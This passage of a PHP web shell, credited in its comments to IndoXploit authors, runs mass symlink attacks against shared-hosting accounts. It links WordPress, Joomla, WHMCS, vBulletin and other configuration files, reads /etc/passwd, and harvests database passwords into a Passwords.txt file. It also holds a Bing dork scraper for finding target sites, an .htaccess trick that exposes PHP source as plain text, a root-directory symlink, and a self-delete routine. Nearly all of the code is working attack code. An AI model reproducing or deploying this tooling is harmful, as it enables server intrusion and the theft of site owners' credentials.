  2596. @symlink('/home9/'.$user.'/public_html/zencart/includes/dist-configure.php',$user.'-Zencart.txt');
  2597. @symlink('/home9/'.$user.'/public_html/products/includes/dist-configure.php',$user.'-Zencart.txt');
  2598. @symlink('/home9/'.$user.'/public_html/cart/includes/dist-configure.php',$user.'-Zencart.txt');
  2599. @symlink('/home9/'.$user.'/public_html/shop/includes/dist-configure.php',$user.'-Zencart.txt');
  2600. @symlink('/home9/'.$user.'/public_html/includes/iso4217.php',$user.'-Hostbills.txt');
  2601. @symlink('/home9/'.$user.'/public_html/hostbills/includes/iso4217.php',$user.'-Hostbills.txt');
  2602. @symlink('/home9/'.$user.'/public_html/host/includes/iso4217.php',$user.'-Hostbills.txt');
  2603. @symlink('/home9/'.$user.'/public_html/Host/includes/iso4217.php',$user.'-Hostbills.txt');
  2604. @symlink('/home9/'.$user.'/public_html/supportes/includes/iso4217.php',$user.'-Hostbills.txt');
  2605. @symlink('/home9/'.$user.'/public_html/support/includes/iso4217.php',$user.'-Hostbills.txt');
  2606. @symlink('/home9/'.$user.'/public_html/hosting/includes/iso4217.php',$user.'-Hostbills.txt');
  2607. @symlink('/home9/'.$user.'/public_html/cart/includes/iso4217.php',$user.'-Hostbills.txt');
  2608. @symlink('/home9/'.$user.'/public_html/order/includes/iso4217.php',$user.'-Hostbills.txt');
  2609. @symlink('/home9/'.$user.'/public_html/client/includes/iso4217.php',$user.'-Hostbills.txt');
  2610. @symlink('/home9/'.$user.'/public_html/clients/includes/iso4217.php',$user.'-Hostbills.txt');
  2611. @symlink('/home9/'.$user.'/public_html/cliente/includes/iso4217.php',$user.'-Hostbills.txt');
  2612. @symlink('/home9/'.$user.'/public_html/clientes/includes/iso4217.php',$user.'-Hostbills.txt');
  2613. @symlink('/home9/'.$user.'/public_html/billing/includes/iso4217.php',$user.'-Hostbills.txt');
  2614. @symlink('/home9/'.$user.'/public_html/billings/includes/iso4217.php',$user.'-Hostbills.txt');
  2615. @symlink('/home9/'.$user.'/public_html/my/includes/iso4217.php',$user.'-Hostbills.txt');
  2616. @symlink('/home9/'.$user.'/public_html/secure/includes/iso4217.php',$user.'-Hostbills.txt');
  2617. @symlink('/home9/'.$user.'/public_html/support/order/includes/iso4217.php',$user.'-Hostbills.txt');
  2618. @symlink('/home9/'.$user.'/.my.cnf',$user.'-Cpanel.txt');
  2619. @symlink('/home9/'.$user.'/public_html/po-content/config.php',$user.'-Popoji.txt');
  2620.  
  2621. //home 10
  2622.  
  2623. @symlink('/home10/'.$user.'/public_html/vb/includes/config.php',$user.'-Vbulletin.txt');
  2624. @symlink('/home10/'.$user.'/public_html/includes/config.php',$user.'-Vbulletin.txt');
  2625. @symlink('/home10/'.$user.'/public_html/forum/includes/config.php',$user.'-Vbulletin.txt');
  2626. @symlink('/home10/'.$user.'/public_html/forums/includes/config.php',$user.'-Vbulletin.txt');
  2627. @symlink('/home10/'.$user.'/public_html/cc/includes/config.php',$user.'-Vbulletin.txt');
  2628. @symlink('/home10/'.$user.'/public_html/inc/config.php',$user.'-MyBB.txt');
  2629. @symlink('/home10/'.$user.'/public_html/includes/configure.php',$user.'-OsCommerce.txt');
  2630. @symlink('/home10/'.$user.'/public_html/shop/includes/configure.php',$user.'-OsCommerce.txt');
  2631. @symlink('/home10/'.$user.'/public_html/os/includes/configure.php',$user.'-OsCommerce.txt');
  2632. @symlink('/home10/'.$user.'/public_html/oscom/includes/configure.php',$user.'-OsCommerce.txt');
  2633. @symlink('/home10/'.$user.'/public_html/products/includes/configure.php',$user.'-OsCommerce.txt');
  2634. @symlink('/home10/'.$user.'/public_html/cart/includes/configure.php',$user.'-OsCommerce.txt');
  2635. @symlink('/home10/'.$user.'/public_html/inc/conf_global.php',$user.'-IPB.txt');
  2636. @symlink('/home10/'.$user.'/public_html/wp-config.php',$user.'-Wordpress.txt');
  2637. @symlink('/home10/'.$user.'/public_html/wp/test/wp-config.php',$user.'-Wordpress.txt');
  2638. @symlink('/home10/'.$user.'/public_html/blog/wp-config.php',$user.'-Wordpress.txt');
  2639. @symlink('/home10/'.$user.'/public_html/beta/wp-config.php',$user.'-Wordpress.txt');
  2640. @symlink('/home10/'.$user.'/public_html/portal/wp-config.php',$user.'-Wordpress.txt');
  2641. @symlink('/home10/'.$user.'/public_html/site/wp-config.php',$user.'-Wordpress.txt');
  2642. @symlink('/home10/'.$user.'/public_html/wp/wp-config.php',$user.'-Wordpress.txt');
  2643. @symlink('/home10/'.$user.'/public_html/WP/wp-config.php',$user.'-Wordpress.txt');
  2644. @symlink('/home10/'.$user.'/public_html/news/wp-config.php',$user.'-Wordpress.txt');
  2645. @symlink('/home10/'.$user.'/public_html/wordpress/wp-config.php',$user.'-Wordpress.txt');
  2646. @symlink('/home10/'.$user.'/public_html/test/wp-config.php',$user.'-Wordpress.txt');
  2647. @symlink('/home10/'.$user.'/public_html/demo/wp-config.php',$user.'-Wordpress.txt');
  2648. @symlink('/home10/'.$user.'/public_html/home/wp-config.php',$user.'-Wordpress.txt');
  2649. @symlink('/home10/'.$user.'/public_html/v1/wp-config.php',$user.'-Wordpress.txt');
  2650. @symlink('/home10/'.$user.'/public_html/v2/wp-config.php',$user.'-Wordpress.txt');
  2651. @symlink('/home10/'.$user.'/public_html/press/wp-config.php',$user.'-Wordpress.txt');
  2652. @symlink('/home10/'.$user.'/public_html/new/wp-config.php',$user.'-Wordpress.txt');
  2653. @symlink('/home10/'.$user.'/public_html/blogs/wp-config.php',$user.'-Wordpress.txt');
  2654. @symlink('/home10/'.$user.'/public_html/configuration.php',$user.'-Joomla.txt');
  2655. @symlink('/home10/'.$user.'/public_html/blog/configuration.php',$user.'-Joomla.txt');
  2656. @symlink('/home10/'.$user.'/public_html/submitticket.php',$user.'-^WHMCS.txt');
  2657. @symlink('/home10/'.$user.'/public_html/cms/configuration.php',$user.'-Joomla.txt');
  2658. @symlink('/home10/'.$user.'/public_html/beta/configuration.php',$user.'-Joomla.txt');
  2659. @symlink('/home10/'.$user.'/public_html/portal/configuration.php',$user.'-Joomla.txt');
  2660. @symlink('/home10/'.$user.'/public_html/site/configuration.php',$user.'-Joomla.txt');
  2661. @symlink('/home10/'.$user.'/public_html/main/configuration.php',$user.'-Joomla.txt');
  2662. @symlink('/home10/'.$user.'/public_html/home/configuration.php',$user.'-Joomla.txt');
  2663. @symlink('/home10/'.$user.'/public_html/demo/configuration.php',$user.'-Joomla.txt');
  2664. @symlink('/home10/'.$user.'/public_html/test/configuration.php',$user.'-Joomla.txt');
  2665. @symlink('/home10/'.$user.'/public_html/v1/configuration.php',$user.'-Joomla.txt');
  2666. @symlink('/home10/'.$user.'/public_html/v2/configuration.php',$user.'-Joomla.txt');
  2667. @symlink('/home10/'.$user.'/public_html/joomla/configuration.php',$user.'-Joomla.txt');
  2668. @symlink('/home10/'.$user.'/public_html/new/configuration.php',$user.'-Joomla.txt');
  2669. @symlink('/home10/'.$user.'/public_html/WHMCS/configuration.php',$user.'-WHMCS.txt');
  2670. @symlink('/home10/'.$user.'/public_html/whmcs1/configuration.php',$user.'-WHMCS.txt');
  2671. @symlink('/home10/'.$user.'/public_html/Whmcs/configuration.php',$user.'-WHMCS.txt');
  2672. @symlink('/home10/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  2673. @symlink('/home10/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  2674. @symlink('/home10/'.$user.'/public_html/WHMC/configuration.php',$user.'-WHMCS.txt');
  2675. @symlink('/home10/'.$user.'/public_html/Whmc/configuration.php',$user.'-WHMCS.txt');
  2676. @symlink('/home10/'.$user.'/public_html/whmc/configuration.php',$user.'-WHMCS.txt');
  2677. @symlink('/home10/'.$user.'/public_html/WHM/configuration.php',$user.'-WHMCS.txt');
  2678. @symlink('/home10/'.$user.'/public_html/Whm/configuration.php',$user.'-WHMCS.txt');
  2679. @symlink('/home10/'.$user.'/public_html/whm/configuration.php',$user.'-WHMCS.txt');
  2680. @symlink('/home10/'.$user.'/public_html/HOST/configuration.php',$user.'-WHMCS.txt');
  2681. @symlink('/home10/'.$user.'/public_html/Host/configuration.php',$user.'-WHMCS.txt');
  2682. @symlink('/home10/'.$user.'/public_html/host/configuration.php',$user.'-WHMCS.txt');
  2683. @symlink('/home10/'.$user.'/public_html/SUPPORTES/configuration.php',$user.'-WHMCS.txt');
  2684. @symlink('/home10/'.$user.'/public_html/Supportes/configuration.php',$user.'-WHMCS.txt');
  2685. @symlink('/home10/'.$user.'/public_html/supportes/configuration.php',$user.'-WHMCS.txt');
  2686. @symlink('/home10/'.$user.'/public_html/domains/configuration.php',$user.'-WHMCS.txt');
  2687. @symlink('/home10/'.$user.'/public_html/domain/configuration.php',$user.'-WHMCS.txt');
  2688. @symlink('/home10/'.$user.'/public_html/Hosting/configuration.php',$user.'-WHMCS.txt');
  2689. @symlink('/home10/'.$user.'/public_html/HOSTING/configuration.php',$user.'-WHMCS.txt');
  2690. @symlink('/home10/'.$user.'/public_html/hosting/configuration.php',$user.'-WHMCS.txt');
  2691. @symlink('/home10/'.$user.'/public_html/CART/configuration.php',$user.'-WHMCS.txt');
  2692. @symlink('/home10/'.$user.'/public_html/Cart/configuration.php',$user.'-WHMCS.txt');
  2693. @symlink('/home10/'.$user.'/public_html/cart/configuration.php',$user.'-WHMCS.txt');
  2694. @symlink('/home10/'.$user.'/public_html/ORDER/configuration.php',$user.'-WHMCS.txt');
  2695. @symlink('/home10/'.$user.'/public_html/Order/configuration.php',$user.'-WHMCS.txt');
  2696. @symlink('/home10/'.$user.'/public_html/order/configuration.php',$user.'-WHMCS.txt');
  2697. @symlink('/home10/'.$user.'/public_html/CLIENT/configuration.php',$user.'-WHMCS.txt');
  2698. @symlink('/home10/'.$user.'/public_html/Client/configuration.php',$user.'-WHMCS.txt');
  2699. @symlink('/home10/'.$user.'/public_html/client/configuration.php',$user.'-WHMCS.txt');
  2700. @symlink('/home10/'.$user.'/public_html/CLIENTAREA/configuration.php',$user.'-WHMCS.txt');
  2701. @symlink('/home10/'.$user.'/public_html/Clientarea/configuration.php',$user.'-WHMCS.txt');
  2702. @symlink('/home10/'.$user.'/public_html/clientarea/configuration.php',$user.'-WHMCS.txt');
  2703. @symlink('/home10/'.$user.'/public_html/SUPPORT/configuration.php',$user.'-WHMCS.txt');
  2704. @symlink('/home10/'.$user.'/public_html/Support/configuration.php',$user.'-WHMCS.txt');
  2705. @symlink('/home10/'.$user.'/public_html/support/configuration.php',$user.'-WHMCS.txt');
  2706. @symlink('/home10/'.$user.'/public_html/BILLING/configuration.php',$user.'-WHMCS.txt');
  2707. @symlink('/home10/'.$user.'/public_html/Billing/configuration.php',$user.'-WHMCS.txt');
  2708. @symlink('/home10/'.$user.'/public_html/billing/configuration.php',$user.'-WHMCS.txt');
  2709. @symlink('/home10/'.$user.'/public_html/BUY/configuration.php',$user.'-WHMCS.txt');
  2710. @symlink('/home10/'.$user.'/public_html/Buy/configuration.php',$user.'-WHMCS.txt');
  2711. @symlink('/home10/'.$user.'/public_html/buy/configuration.php',$user.'-WHMCS.txt');
  2712. @symlink('/home10/'.$user.'/public_html/MANAGE/configuration.php',$user.'-WHMCS.txt');
  2713. @symlink('/home10/'.$user.'/public_html/Manage/configuration.php',$user.'-WHMCS.txt');
  2714. @symlink('/home10/'.$user.'/public_html/manage/configuration.php',$user.'-WHMCS.txt');
  2715. @symlink('/home10/'.$user.'/public_html/CLIENTSUPPORT/configuration.php',$user.'-WHMCS.txt');
  2716. @symlink('/home10/'.$user.'/public_html/ClientSupport/configuration.php',$user.'-WHMCS.txt');
  2717. @symlink('/home10/'.$user.'/public_html/Clientsupport/configuration.php',$user.'-WHMCS.txt');
  2718. @symlink('/home10/'.$user.'/public_html/clientsupport/configuration.php',$user.'-WHMCS.txt');
  2719. @symlink('/home10/'.$user.'/public_html/CHECKOUT/configuration.php',$user.'-WHMCS.txt');
  2720. @symlink('/home10/'.$user.'/public_html/Checkout/configuration.php',$user.'-WHMCS.txt');
  2721. @symlink('/home10/'.$user.'/public_html/checkout/configuration.php',$user.'-WHMCS.txt');
  2722. @symlink('/home10/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  2723. @symlink('/home10/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  2724. @symlink('/home10/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  2725. @symlink('/home10/'.$user.'/public_html/BASKET/configuration.php',$user.'-WHMCS.txt');
  2726. @symlink('/home10/'.$user.'/public_html/Basket/configuration.php',$user.'-WHMCS.txt');
  2727. @symlink('/home10/'.$user.'/public_html/basket/configuration.php',$user.'-WHMCS.txt');
  2728. @symlink('/home10/'.$user.'/public_html/SECURE/configuration.php',$user.'-WHMCS.txt');
  2729. @symlink('/home10/'.$user.'/public_html/Secure/configuration.php',$user.'-WHMCS.txt');
  2730. @symlink('/home10/'.$user.'/public_html/secure/configuration.php',$user.'-WHMCS.txt');
  2731. @symlink('/home10/'.$user.'/public_html/SALES/configuration.php',$user.'-WHMCS.txt');
  2732. @symlink('/home10/'.$user.'/public_html/Sales/configuration.php',$user.'-WHMCS.txt');
  2733. @symlink('/home10/'.$user.'/public_html/sales/configuration.php',$user.'-WHMCS.txt');
  2734. @symlink('/home10/'.$user.'/public_html/BILL/configuration.php',$user.'-WHMCS.txt');
  2735. @symlink('/home10/'.$user.'/public_html/Bill/configuration.php',$user.'-WHMCS.txt');
  2736. @symlink('/home10/'.$user.'/public_html/bill/configuration.php',$user.'-WHMCS.txt');
  2737. @symlink('/home10/'.$user.'/public_html/PURCHASE/configuration.php',$user.'-WHMCS.txt');
  2738. @symlink('/home10/'.$user.'/public_html/Purchase/configuration.php',$user.'-WHMCS.txt');
  2739. @symlink('/home10/'.$user.'/public_html/purchase/configuration.php',$user.'-WHMCS.txt');
  2740. @symlink('/home10/'.$user.'/public_html/ACCOUNT/configuration.php',$user.'-WHMCS.txt');
  2741. @symlink('/home10/'.$user.'/public_html/Account/configuration.php',$user.'-WHMCS.txt');
  2742. @symlink('/home10/'.$user.'/public_html/account/configuration.php',$user.'-WHMCS.txt');
  2743. @symlink('/home10/'.$user.'/public_html/USER/configuration.php',$user.'-WHMCS.txt');
  2744. @symlink('/home10/'.$user.'/public_html/User/configuration.php',$user.'-WHMCS.txt');
  2745. @symlink('/home10/'.$user.'/public_html/user/configuration.php',$user.'-WHMCS.txt');
  2746. @symlink('/home10/'.$user.'/public_html/CLIENTS/configuration.php',$user.'-WHMCS.txt');
  2747. @symlink('/home10/'.$user.'/public_html/Clients/configuration.php',$user.'-WHMCS.txt');
  2748. @symlink('/home10/'.$user.'/public_html/clients/configuration.php',$user.'-WHMCS.txt');
  2749. @symlink('/home10/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  2750. @symlink('/home10/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  2751. @symlink('/home10/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  2752. @symlink('/home10/'.$user.'/public_html/MY/configuration.php',$user.'-WHMCS.txt');
  2753. @symlink('/home10/'.$user.'/public_html/My/configuration.php',$user.'-WHMCS.txt');
  2754. @symlink('/home10/'.$user.'/public_html/my/configuration.php',$user.'-WHMCS.txt');
  2755. @symlink('/home10/'.$user.'/public_html/secure/whm/configuration.php',$user.'-WHMCS.txt');
  2756. @symlink('/home10/'.$user.'/public_html/secure/whmcs/configuration.php',$user.'-WHMCS.txt');
  2757. @symlink('/home10/'.$user.'/public_html/panel/configuration.php',$user.'-WHMCS.txt');
  2758. @symlink('/home10/'.$user.'/public_html/clientes/configuration.php',$user.'-WHMCS.txt');
  2759. @symlink('/home10/'.$user.'/public_html/cliente/configuration.php',$user.'-WHMCS.txt');
  2760. @symlink('/home10/'.$user.'/public_html/support/order/configuration.php',$user.'-WHMCS.txt');
  2761. @symlink('/home10/'.$user.'/public_html/bb-config.php',$user.'-BoxBilling.txt');
  2762. @symlink('/home10/'.$user.'/public_html/boxbilling/bb-config.php',$user.'-BoxBilling.txt');
  2763. @symlink('/home10/'.$user.'/public_html/box/bb-config.php',$user.'-BoxBilling.txt');
  2764. @symlink('/home10/'.$user.'/public_html/host/bb-config.php',$user.'-BoxBilling.txt');
  2765. @symlink('/home10/'.$user.'/public_html/Host/bb-config.php',$user.'-BoxBilling.txt');
  2766. @symlink('/home10/'.$user.'/public_html/supportes/bb-config.php',$user.'-BoxBilling.txt');
  2767. @symlink('/home10/'.$user.'/public_html/support/bb-config.php',$user.'-BoxBilling.txt');
  2768. @symlink('/home10/'.$user.'/public_html/hosting/bb-config.php',$user.'-BoxBilling.txt');
  2769. @symlink('/home10/'.$user.'/public_html/cart/bb-config.php',$user.'-BoxBilling.txt');
  2770. @symlink('/home10/'.$user.'/public_html/order/bb-config.php',$user.'-BoxBilling.txt');
  2771. @symlink('/home10/'.$user.'/public_html/client/bb-config.php',$user.'-BoxBilling.txt');
  2772. @symlink('/home10/'.$user.'/public_html/clients/bb-config.php',$user.'-BoxBilling.txt');
  2773. @symlink('/home10/'.$user.'/public_html/cliente/bb-config.php',$user.'-BoxBilling.txt');
  2774. @symlink('/home10/'.$user.'/public_html/clientes/bb-config.php',$user.'-BoxBilling.txt');
  2775. @symlink('/home10/'.$user.'/public_html/billing/bb-config.php',$user.'-BoxBilling.txt');
  2776. @symlink('/home10/'.$user.'/public_html/billings/bb-config.php',$user.'-BoxBilling.txt');
  2777. @symlink('/home10/'.$user.'/public_html/my/bb-config.php',$user.'-BoxBilling.txt');
  2778. @symlink('/home10/'.$user.'/public_html/secure/bb-config.php',$user.'-BoxBilling.txt');
  2779. @symlink('/home10/'.$user.'/public_html/support/order/bb-config.php',$user.'-BoxBilling.txt');
  2780. @symlink('/home10/'.$user.'/public_html/includes/dist-configure.php',$user.'-Zencart.txt');
  2781. @symlink('/home10/'.$user.'/public_html/zencart/includes/dist-configure.php',$user.'-Zencart.txt');
  2782. @symlink('/home10/'.$user.'/public_html/products/includes/dist-configure.php',$user.'-Zencart.txt');
  2783. @symlink('/home10/'.$user.'/public_html/cart/includes/dist-configure.php',$user.'-Zencart.txt');
  2784. @symlink('/home10/'.$user.'/public_html/shop/includes/dist-configure.php',$user.'-Zencart.txt');
  2785. @symlink('/home10/'.$user.'/public_html/includes/iso4217.php',$user.'-Hostbills.txt');
  2786. @symlink('/home10/'.$user.'/public_html/hostbills/includes/iso4217.php',$user.'-Hostbills.txt');
  2787. @symlink('/home10/'.$user.'/public_html/host/includes/iso4217.php',$user.'-Hostbills.txt');
  2788. @symlink('/home10/'.$user.'/public_html/Host/includes/iso4217.php',$user.'-Hostbills.txt');
  2789. @symlink('/home10/'.$user.'/public_html/supportes/includes/iso4217.php',$user.'-Hostbills.txt');
  2790. @symlink('/home10/'.$user.'/public_html/support/includes/iso4217.php',$user.'-Hostbills.txt');
  2791. @symlink('/home10/'.$user.'/public_html/hosting/includes/iso4217.php',$user.'-Hostbills.txt');
  2792. @symlink('/home10/'.$user.'/public_html/cart/includes/iso4217.php',$user.'-Hostbills.txt');
  2793. @symlink('/home10/'.$user.'/public_html/order/includes/iso4217.php',$user.'-Hostbills.txt');
  2794. @symlink('/home10/'.$user.'/public_html/client/includes/iso4217.php',$user.'-Hostbills.txt');
  2795. @symlink('/home10/'.$user.'/public_html/clients/includes/iso4217.php',$user.'-Hostbills.txt');
  2796. @symlink('/home10/'.$user.'/public_html/cliente/includes/iso4217.php',$user.'-Hostbills.txt');
  2797. @symlink('/home10/'.$user.'/public_html/clientes/includes/iso4217.php',$user.'-Hostbills.txt');
  2798. @symlink('/home10/'.$user.'/public_html/billing/includes/iso4217.php',$user.'-Hostbills.txt');
  2799. @symlink('/home10/'.$user.'/public_html/billings/includes/iso4217.php',$user.'-Hostbills.txt');
  2800. @symlink('/home10/'.$user.'/public_html/my/includes/iso4217.php',$user.'-Hostbills.txt');
  2801. @symlink('/home10/'.$user.'/public_html/secure/includes/iso4217.php',$user.'-Hostbills.txt');
  2802. @symlink('/home10/'.$user.'/public_html/support/order/includes/iso4217.php',$user.'-Hostbills.txt');
  2803. @symlink('/home10/'.$user.'/.my.cnf',$user.'-Cpanel.txt');
  2804. @symlink('/home10/'.$user.'/public_html/po-content/config.php',$user.'-Popoji.txt');
  2805. }
  2806.  
  2807. //password grab
  2808.  
  2809. function entre2v2($text,$marqueurDebutLien,$marqueurFinLien)
  2810. {
  2811.  
  2812. $ar0=explode($marqueurDebutLien, $text);
  2813. $ar1=explode($marqueurFinLien, $ar0[1]);
  2814. $ar=trim($ar1[0]);
  2815. return $ar;
  2816. }
  2817.  
  2818. $ffile=fopen('Passwords.txt','a+');
  2819.  
  2820.  
  2821. $r= 'http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME'])."/c7e_symconf/";
  2822. $re=$r;
  2823. $confi=array("-Wordpress.txt","-Joomla.txt","-WHMCS.txt","-Vbulletin.txt","-Other.txt","-Zencart.txt","-Hostbills.txt","-SMF.txt","-Drupal.txt","-OsCommerce.txt","-MyBB.txt","-PHPBB.txt","-IPB.txt","-BoxBilling.txt");
  2824.  
  2825. $users=file("/etc/passwd");
  2826. foreach($users as $user)
  2827. {
  2828.  
  2829. $str=explode(":",$user);
  2830. $usersss=$str[0];
  2831. foreach($confi as $co)
  2832. {
  2833.  
  2834.  
  2835. $uurl=$re.$usersss.$co;
  2836. $uel=$uurl;
  2837.  
  2838. $ch = curl_init();
  2839.  
  2840. curl_setopt($ch, CURLOPT_URL, $uel);
  2841. curl_setopt($ch, CURLOPT_HEADER, 1);
  2842. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  2843. curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
  2844. curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.8) Gecko/2009032609 Firefox/3.0.8');
  2845. $result['EXE'] = curl_exec($ch);
  2846. curl_close($ch);
  2847. $uxl=$result['EXE'];
  2848.  
  2849.  
  2850. if($uxl && preg_match('/table_prefix/i',$uxl))
  2851. {
  2852.  
  2853. //Wordpress
  2854.  
  2855. $dbp=entre2v2($uxl,"DB_PASSWORD', '","');");
  2856. if(!empty($dbp))
  2857. $pass=$dbp."\n";
  2858. fwrite($ffile,$pass);
  2859.  
  2860. }
  2861. elseif($uxl && preg_match('/cc_encryption_hash/i',$uxl))
  2862. {
  2863.  
  2864. //WHMCS
  2865.  
  2866. $dbp=entre2v2($uxl,"db_password = '","';");
  2867. if(!empty($dbp))
  2868. $pass=$dbp."\n";
  2869. fwrite($ffile,$pass);
  2870.  
  2871. }
  2872.  
  2873.  
  2874. elseif($uxl && preg_match('/dbprefix/i',$uxl))
  2875. {
  2876.  
  2877. //Joomla
  2878.  
  2879. $db=entre2v2($uxl,"password = '","';");
  2880. if(!empty($db))
  2881. $pass=$db."\n";
  2882. fwrite($ffile,$pass);
  2883. }
  2884. elseif($uxl && preg_match('/admincpdir/i',$uxl))
  2885. {
  2886.  
  2887. //Vbulletin
  2888.  
  2889. $db=entre2v2($uxl,"password'] = '","';");
  2890. if(!empty($db))
  2891. $pass=$db."\n";
  2892. fwrite($ffile,$pass);
  2893.  
  2894. }
  2895. elseif($uxl && preg_match('/DB_DATABASE/i',$uxl))
  2896. {
  2897.  
  2898. //Other
  2899.  
  2900. $db=entre2v2($uxl,"DB_PASSWORD', '","');");
  2901. if(!empty($db))
  2902. $pass=$db."\n";
  2903. fwrite($ffile,$pass);
  2904. }
  2905. elseif($uxl && preg_match('/dbpass/i',$uxl))
  2906. {
  2907.  
  2908. //Other
  2909.  
  2910. $db=entre2v2($uxl,"dbpass = '","';");
  2911. if(!empty($db))
  2912. $pass=$db."\n";
  2913. fwrite($ffile,$pass);
  2914. }
  2915. elseif($uxl && preg_match('/dbpass/i',$uxl))
  2916. {
  2917.  
  2918. //Other
  2919.  
  2920. $db=entre2v2($uxl,"dbpass = '","';");
  2921. if(!empty($db))
  2922. $pass=$db."\n";
  2923. fwrite($ffile,$pass);
  2924.  
  2925. }
  2926. elseif($uxl && preg_match('/dbpass/i',$uxl))
  2927. {
  2928.  
  2929. //Other
  2930.  
  2931. $db=entre2v2($uxl,"dbpass = \"","\";");
  2932. if(!empty($db))
  2933. $pass=$db."\n";
  2934. fwrite($ffile,$pass);
  2935. }
  2936.  
  2937.  
  2938. }
  2939. }
  2940. echo "<center>
  2941. <a href=\"c7e_symconf/root/\">Root Server</a>
  2942. <br><a href=\"c7e_symconf/Passwords.txt\">Passwords</a>
  2943. <br><a href=\"c7e_symconf/\">Configurations</a></center>";
  2944. }
  2945. else
  2946. {
  2947. echo "<center>
  2948. <form method=\"POST\">
  2949. <textarea name=\"passwd\" class='area' rows='15' cols='60'>";
  2950. $file = '/etc/passwd';
  2951. $read = @fopen($file, 'r');
  2952. if ($read){
  2953. $body = @fread($read, @filesize($file));
  2954. echo "".htmlentities($body)."";
  2955. }
  2956. elseif(!$read)
  2957. {
  2958. $read = @show_source($file) ;
  2959. }
  2960. elseif(!$read)
  2961. {
  2962. $read = @highlight_file($file);
  2963. }
  2964. elseif(!$read)
  2965. {
  2966. for($uid=0;$uid<1000;$uid++)
  2967. {
  2968. $ara = posix_getpwuid($uid);
  2969. if (!empty($ara))
  2970. {
  2971. while (list ($key, $val) = each($ara))
  2972. {
  2973. print "$val:";
  2974. }
  2975. print "\n";
  2976. }}}
  2977.  
  2978. flush();
  2979.  
  2980. echo "</textarea>
  2981. <p><input name=\"m\" size=\"80\" value=\"Start\" type=\"submit\"/></p>
  2982. </form></center>";
  2983. }
  2984. }
  2985. } elseif(isset($_GET['EnsikologyScience']) && ($_GET['EnsikologyScience'] == 'bing'))
  2986. { @ini_set('output_buffering',0);
  2987. ?>
  2988. <head>
  2989. <style type="text/css">
  2990. textarea {
  2991. width: 500px;
  2992. height: 250px;
  2993. border: 1px solid #000000;
  2994. margin: 5px auto;
  2995. padding: 7px;
  2996. }
  2997. input[type=text] {
  2998. padding-left: 7px;
  2999. width: 250px;
  3000. height: 25px;
  3001. border: 1px solid #000000;
  3002. background: white;
  3003. margin: 5px auto;
  3004. }
  3005. </style>
  3006. </head>
  3007. <center><form method="post">
  3008. Bing Dork: <input type="text" name="dork" placeholder="dork" required>
  3009. <input type="submit" name="go" value=">>">
  3010. </form>
  3011. <?php
  3012. // coded by Mr. Magnom
  3013. // Re-Coded to Web Based by Mr. Error 404 - IndoXploit
  3014. // greetz to Mr. Magnom - Sanjungan Jiwa
  3015. function getsource($url, $proxy) {
  3016. $curl = curl_init($url);
  3017. curl_setopt($curl, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']);
  3018. curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
  3019. if($proxy) {
  3020. $proxy = explode(':', autoprox());
  3021. curl_setopt($curl, CURLOPT_PROXY, $proxy[0]);
  3022. curl_setopt($curl, CURLOPT_PROXYPORT, $proxy[1]);
  3023. }
  3024. $content = curl_exec($curl);
  3025. curl_close($curl);
  3026. return $content;
  3027. }
  3028. $dork = htmlspecialchars($_POST['dork']);
  3029. $do = urlencode($dork);
  3030. if(isset($_POST['go'])) {
  3031. $npage = 1;
  3032. $npages = 30000;
  3033. $allLinks = array();
  3034. $lll = array();
  3035. while($npage <= $npages) {
  3036. $x = getsource("http://www.bing.com/search?q=".$do."&first=".$npage."", $proxy);
  3037. if($x) {
  3038. preg_match_all('#<h2><a href="(.*?)" h="ID#', $x, $findlink);
  3039. foreach ($findlink[1] as $fl) array_push($allLinks, $fl);
  3040. $npage = $npage + 10;
  3041. if (preg_match("(first=" . $npage . "&amp)siU", $x, $linksuiv) == 0) break;
  3042. } else break;
  3043. }
  3044. $URLs = array();
  3045. foreach($allLinks as $url){
  3046. $exp = explode("/", $url);
  3047. $URLs[] = $exp[2];
  3048. }
  3049. $array = array_filter($URLs);
  3050. $array = array_unique($array);
  3051. $sss = count(array_unique($array));
  3052. echo "ToTaL SiTe : $sss<br>";
  3053. foreach($array as $domain) {
  3054. echo "http://$domain/<br>";
  3055. }
  3056. }
  3057. }elseif($_GET['EnsikologyScience'] == 'info') {
  3058. echo '<br><table width="700" align="center">
  3059. <tr><td>
  3060. <center>
  3061. System : '.$sys.'<br>
  3062. IP : '.$ip.'<br>
  3063. Safe Mode : '.$sm.'<br>
  3064. Disabled Functions : '.$ds.'<br>
  3065. Home_root : '.$home_r.'
  3066. </center>
  3067. </td></tr>
  3068. </table>';
  3069. }elseif($_GET['EnsikologyScience'] == 'kill') {
  3070. $fileini = $_SERVER['SCRIPT_FILENAME'];
  3071. rmdir('c7e_sym');rmdir('c7e_conf');unlink($fileini);
  3072. echo 'Good By User :)';
  3073. }
  3074. elseif($_GET['EnsikologyScience'] == 'symlink') {
  3075. $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $path);
  3076. $d0mains = @file("/etc/named.conf");
  3077. ##httaces
  3078. if($d0mains){
  3079. @mkdir("c7e_sym",0777);
  3080. @chdir("c7e_sym");
  3081. @exe("ln -s / c7e");
  3082. $file3 = 'Options Indexes FollowSymLinks
  3083. DirectoryIndex c7e.htm
  3084. AddType text/plain .php
  3085. AddHandler text/plain .php
  3086. Satisfy Any';
  3087. $fp3 = fopen('.htaccess','w');
  3088. $fw3 = fwrite($fp3,$file3);@fclose($fp3);
  3089. echo "
  3090. <table align=center border=1 style='width:60%;border-color:#000000;'>
  3091. <tr>
  3092. <td align=center><font size=2>S. No.</font></td>
  3093. <td align=center><font size=2>Domains</font></td>
  3094. <td align=center><font size=2>Users</font></td>
  3095. <td align=center><font size=2>Symlink</font></td>
  3096. </tr>";
  3097. $dcount = 1;
